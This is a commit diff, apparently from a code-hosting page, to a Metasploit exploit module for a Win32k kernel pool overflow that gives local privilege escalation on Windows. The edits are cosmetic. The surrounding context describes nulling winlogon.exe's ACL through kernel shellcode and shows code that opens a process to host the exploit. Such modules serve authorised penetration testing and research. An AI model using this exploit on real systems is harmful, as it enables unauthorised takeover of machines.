kyuz0
commit
faaf0787a5
|
|
@ -15,13 +15,13 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::Windows::FileInfo
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)',
|
||||
'Description' => %q{
|
||||
A kernel pool overflow in Win32k which allows local privilege escalation.
|
||||
The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
|
||||
The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
|
||||
This allows any unprivileged process to freely migrate to winlogon.exe, achieving
|
||||
privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox.
|
||||
NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash.
|
||||
|
|
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
|
||||
print_good("Process #{process.pid} launched.")
|
||||
rescue Rex::Post::Meterpreter::RequestError
|
||||
print_status("Operation failed. Trying to elevate the current process...")
|
||||
print_status("Operation failed. Hosting exploit in the current process...")
|
||||
process = client.sys.process.open
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue